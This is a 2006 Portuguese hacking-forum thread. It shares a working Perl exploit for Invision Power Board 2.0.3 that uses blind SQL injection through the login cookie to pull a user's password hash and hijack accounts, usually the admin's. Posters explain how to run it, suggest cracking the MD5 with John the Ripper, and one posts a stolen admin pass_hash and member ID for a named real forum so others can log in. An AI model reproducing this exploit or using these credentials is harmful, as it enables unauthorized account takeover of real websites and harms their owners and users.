IPB exploit 2.0.3 | Duvida

Started by branco, 26 de February , 2006, 07:34:07 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

branco

Bom estava eu tentando aprender ingles pra aprender mais e talz...ae eu fui no hackyou dei uma rodada lá e achei esse exploit :


##################################################################
# This one actually works :) Just paste the outputted cookie into
# your request header using livehttpheaders or something and you
# will probably be logged in as that user. No need to decrypt it!
# Exploit coded by "ReMuSOMeGa & Nova" and http://remusomega.com
##################################################################

use LWP::UserAgent;

   $ua = new LWP::UserAgent;
   $ua->agent("Mosiac 1.0" . $ua->agent);

if (!$ARGV[0]) {$ARGV[0] = '';}
if (!$ARGV[3]) {$ARGV[3] = '';}

my $path = $ARGV[0] . '/index.php?act=Login&CODE=autologin';
my $user = $ARGV[1];   # userid to jack
my $iver = $ARGV[2];   # version 1 or 2
my $cpre = $ARGV[3];   # cookie prefix
my $dbug = $ARGV[4];   # debug?

if (!$ARGV[2])
{
        print "..By ReMuSoMeGa & Nova. Usage: ipb.pl http://forums.site.org [id] [ver 1/2].\n\n";
        exit;
}

my @charset = ("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f");

my $outputs = '';

for( $i=1; $i < 33; $i++ )
{
        for( $j=0; $j < 16; $j++ )
        {
                my $current = $charset[$j];
            my $sql = ( $iver < 2 ) ?  "99%2527+OR+(id%3d$user+AND+MID(password,$i,1)%3d%2527$current%2527)/*" :
"99%2527+OR+(id%3d$user+AND+MID(member_login_key,$i,1)%3d%2527$current%2527)/*";
                my @cookie = ('Cookie' => $cpre . "member_id=31337420; " . $cpre . "pass_hash=" . $sql);
                my $res = $ua->get($path, @cookie);

                # If we get a valid sql request then this
                # does not appear anywhere in the sources
                $pattern = '(.*)Log In(.*)';

                $_ = $res->content;

                if ($dbug) { print };

                if ( !(/$pattern/) )
                {
                        $outputs .= $current;
                        print "$current\n";
                    last;
                }

        }
  if ( length($outputs) < 1 )   { print "Not Exploitable!\n"; exit;     }
}
print "Cookie: " . $cpre . "member_id=" . $user . ";" . $cpre . "pass_hash=" . $outputs;
exit;

# ReMuSoMeGa & nova

pra quem quiser usar é simples, só por ele na pasta do seu perl, ir no dos ir pra pasta onde ta o exploit (que é dentro da pasta perl) e fazer o seguinte, perl nomedoexploit.pl www.site.com.br/forum/ 1 ( que geralmente é o ID do admin ) e 2 ( que é a versão do forum, se for 1.*.*, tem que colocar 1, se for 2.*.* tem que por 2) ae as vezes se pega o hash pass do id que vc procurou (em md5), agora eu só tenho uma duvida, tem que desencryptografar o md5 que agente pega ou editar os cookies ?
Olha o trem... Quem vai ficar, quem vai partir? Quem vai chorar, quem vai sorrir?

Anonymous

Amigo, creio que vc tenha que quebrar o MD5. Para isso use o Jonh The Ripper ou o l0phtcrack. ;D

Amilly.. :-*

Cloudy

Bah, aqui deu erro.

Olha só o erro:

Cant's locate LWP/UserAgente.pm in @INC
Alguém pode me ajudar?!? To precisando.

...by Cloudy
"You have to be trusted by the people tou lied to, so when they turn their back on you, you have the chance to the put the knife in." (Roger Waters)

...by Cloudy

Anonymous

Quebrar MD5?!!??!?!?!?!!?


COm BFFFFFFFF?


nossa kra md5 eh gigante nao sei se da pra quebrar com BF nao...

branco

#4
hmm não precisa quebrar a senha...basta editar os cookies...testei nesse site http://www.wingofmadness.com/forums/ind ... owforum=21
não compensa explorar essa falha porque só logamos como admin e nao temos acesso a muitas coisas, pra quem quiser mais vai ter que perde um bom tempo tentando quebrar a md5...

Have Fun

edit: pra quem quiser testar... http://wingofmadness.com/forums/&nbsp; passhash 307af6946c93d5a30e556937c49318cf membe_id 1 ,deletem o resto dexa só os 2
Olha o trem... Quem vai ficar, quem vai partir? Quem vai chorar, quem vai sorrir?